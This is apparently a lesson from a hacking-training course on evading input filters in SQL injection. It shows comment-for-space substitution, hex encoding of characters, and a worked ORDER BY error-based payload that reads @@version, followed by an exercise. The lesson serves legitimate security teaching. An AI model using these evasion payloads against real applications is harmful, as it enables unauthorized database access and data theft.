What if character X cannot be used?

After discovering a vulnerability, you often encounter various challenges in exploiting the vulnerability. For this reason, hackers are required to be resourceful!

Whitespace Comment

Let's take spaces as an example. How can a SQL injection vulnerability be exploited if the vulnerable parameter of the application does not accept any spaces?

One solution is comments! How helpful comments can be. Wouldn't it be fun if comments, reading information_schema, and other functions that are mostly beneficial to attackers were disabled by default, or at least could be turned off? But, let's stay on topic...

So comments, which can conveniently break SQL when injected into it, also work as handy replacements for spaces. SQL interprets the /**/ sequence (empty multiline comment) as a space.

Hexadecimal Escape Characters

What if you wanted to use error-based injection technique, but the < -character, quotation marks, and quotes are blocked? How do you crash the XML processor like in previous modules, where you did it like this: CONCAT("<", …)?

One option is to use the CONCAT function as before, but instead of using "<", use the hexadecimal representation of the < symbol.

Instead of using CONCAT("<", ...) , use CONCAT(0x3c, ...). No <, ' or " characters!

Why 0x3c?

0xJOTAIN means hexadecimal. Hexadecimal just means a value that is represented as a number with a base of 16. You are probably used to the decimal system, which has a base of 10. You have probably also heard of the binary system, which has a base of 2. The base just means how many fingers you have to count with. The same value can always be expressed in any form.

In the decimal system there are ten digits: 0, 1, 2, 3, 4, 5, 6, 7, 8, and 9. After the number 8 comes 9, after 9 comes 10, and after 10 comes 11.

In the nine system there are nine characters: 0, 1, 2, 3, 4, 5, 6, 7, and 8. After the number 7 comes 8, after 8 comes 10, and after 10 comes 11. Note that the number "9" is missing from the "alphabet" of the nine system. The nine system is not practically used anywhere, the purpose is only for you to understand that binary, hexadecimal, octal, decimal system, etc. are not at all different from each other.

In the binary system, the base is 2, which means there are only two characters, 0 and 1. After 0, comes 1, and after 1 comes 10, after 10 comes 11, and after 11 comes 100.

In the hexadecimal system, the base number is 16, which means that it has 16 characters: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, and F. After 8, comes 9, after 9 comes A, after A comes B, and later, after F comes 10. Therefore, in the decimal system, the number 10 is represented as A in hexadecimal, and the number represented in hexadecimal as 10 corresponds to the decimal number 16.

But why exactly 0x3c? 3C is in hexadecimal system... let's calculate, 3 * 16 = 48 + C(12) = 60. The number 60 corresponds to a character in the ASCII character set... sound of drums... <.

What is the ASCII character set?

ASCII is an international standard that has 128 different characters. Almost any programming language, including query languages such as SQL, can convert an ASCII code (such as number 65) to its corresponding character (such as the letter A) and vice versa. You can read about the ASCII character set here: https://en.wikipedia.org/wiki/ASCII

Example

Let's say you want to send something like this to the application:

ORDER BY 1,(SELECT(CONCAT('<',@@version)))

However, you must not use spaces, so you replace them with comments.

ORDER/**/BY/**/1,(SELECT(CONCAT('<',@@version)))

You should also not use text (apostrophes or quotation marks), so replace them with the CONCAT function and ASCII hex codes.

ORDER/**/BY/**/1,(SELECT(CONCAT(0x3c,@@version)))

You can also do this automatically with Hakatemian Transformer tool using Space2Comment and Str2Hex conversions:

Exercise

Equipped with these techniques, try to solve the exercise below! You can't enter all characters, but otherwise the task is identical to the previous module that dealt with the ORDER BY error-based technique.